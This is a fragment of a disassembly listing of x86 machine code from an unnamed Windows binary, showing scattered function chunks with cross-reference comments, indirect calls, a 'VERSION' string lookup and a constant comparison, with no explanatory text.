; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AC764: ; CODE XREF: sub_9B1D80+1EC6�j
push 201h
pop ecx
div ecx
add edx, 200h
loc_9AC772: ; CODE XREF: sub_9B1D80-66EE�j
mov [ebp-2068h], edx
push edx
lea edx, [ebp-201Ch]
push edx
push ebx
lea ecx, [ebp-2058h]
lea edx, [ebp-204Ch]
call sub_9B174C
push dword ptr [ebp-204Ch]
pop eax
and eax, eax
jz loc_9B3EC4
jmp loc_9AC458
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9AC7A8: ; CODE XREF: sub_9B04A8+3EBB�j
; DATA XREF: .text:off_9B9151�o
push 2000h
lea edx, [ebp-401Ch]
push edx
mov eax, 0Ah
lea ecx, [ebp-402Ch]
lea ebx, [ebp-4044h]
mov edi, esi
call sub_9B0734
mov ebx, eax
mov [ebp-404Ch], ebx
test bl, 2
jz loc_9B433A
jmp loc_9B4330
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9AC7E4: ; CODE XREF: sub_9B57B4-22A0�j
; DATA XREF: .text:off_9BA707�o
push off_9B9207
push 0
lea eax, [ebp+var_24]
push eax
call dword ptr [edx+4]
and eax, eax
jz loc_9B45EC
jmp off_9B91C8
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9AC804: ; CODE XREF: sub_9B3A74-8BB4�j
; DATA XREF: .text:off_9B9E28�o
mov dword ptr [ebp-124h], 0
jmp loc_9B624E
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC814: ; CODE XREF: sub_9B0930+37A3�j
; DATA XREF: .text:off_9B9946�o
mov edx, [ebp-1Ch]
mov [ecx], edx
push off_9BAA83
call ebx
push dword_9BCB74
pop ecx
mov edx, [ecx+4]
mov [edx], eax
push off_9B9EC0
call ebx
mov ecx, dword_9BCB74
push dword ptr [ecx+8]
pop edx
mov [edx], eax
push off_9B969B
call ebx
mov ecx, dword_9BCB74
mov edx, [ecx+0Ch]
mov [edx], eax
push off_9B9A8F
call ebx
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx], eax
push off_9B998A
call ebx
mov ecx, dword_9BCB74
mov edx, [ecx+14h]
mov [edx], eax
push offset aVersion ; "VERSION"
call ebx
mov ecx, dword_9BCB74
push dword ptr [ecx+18h]
pop edx
mov [edx], eax
mov eax, dword_9BCB74
mov ecx, [eax]
push dword ptr [ecx]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B89DD
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9AC8A8: ; CODE XREF: sub_9AEC20+4449�j
; DATA XREF: .text:off_9BAF9F�o
push off_9B9844
pop ecx
call sub_9B5480
mov dword_9BBE3C, esi
mov [ebp-228h], edi
loc_9AC8C0: ; CODE XREF: sub_9AEC20+4443�j
lea ecx, [ebp-228h]
call sub_9B5480
push 5
mov ecx, 4
mov edx, off_9B9076
call sub_9B4480
and eax, eax
jnz loc_9AB712
jmp loc_9AB70C
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AC8EC: ; CODE XREF: sub_9B63D8-80DF�j
; DATA XREF: .text:off_9BA158�o
push 0Ch
pop eax
loc_9AC8EF: ; CODE XREF: sub_9B63D8-30B�j
mov [ebp-212Ch], eax
lea edx, [ebx-4]
cmp eax, edx
jg loc_9AC5CD
jmp off_9BAAC4
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9AC908: ; CODE XREF: sub_9B46CC-57ED�j
; sub_9B46CC+9�j
; DATA XREF: ...
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
push esi
call dword ptr [eax+30h]
mov esi, dword_9BCB98
mov dword_9BEC18, eax
call sub_9B227C
add eax, esi
cmp eax, 49614D80h
pop esi
jnb loc_9B2424
jmp off_9BA388
; END OF FUNCTION CHUNK FOR sub_9B46CC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B161C
loc_9AC93C: ; CODE XREF: sub_9B161C+DD�j
; DATA XREF: .text:off_9B962E�o
mov eax, esi
loc_9AC93E: ; CODE XREF: sub_9B161C+D7�j
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
push 0
push eax
push ebx
push edi
call dword ptr [edx+48h]
and eax, eax
jle loc_9AB904
jmp off_9BA98A
; END OF FUNCTION CHUNK FOR sub_9B161C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC960: ; CODE XREF: sub_9B0930-2804�j
; DATA XREF: .text:off_9BB00E�o
push off_9BAB84
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
mov [edx+2Ch], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+2Ch]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp off_9BA378
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B35A0
loc_9AC99B: ; CODE XREF: sub_9B35A0-24A1�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop edx
mov eax, [edx]
push off_9BA623
call dword ptr [eax+1Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B35A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AC9C8: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B24�o ...
lea eax, [edi-1]
mov [ebp-20h], eax
jmp loc_9AED43
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1134
loc_9AC9D7: ; CODE XREF: sub_9B1134+39�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push 0
call dword ptr [edx+60h]
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1134
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ACA04: ; CODE XREF: sub_9B63D8-DF0�j
; DATA XREF: .text:off_9B9082�o
lea esi, [ebp-2120h]
mov ecx, 9
mov edi, off_9B9645
sub edx, edx
repe cmpsb
jnz loc_9AF944
jmp off_9B95D3
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------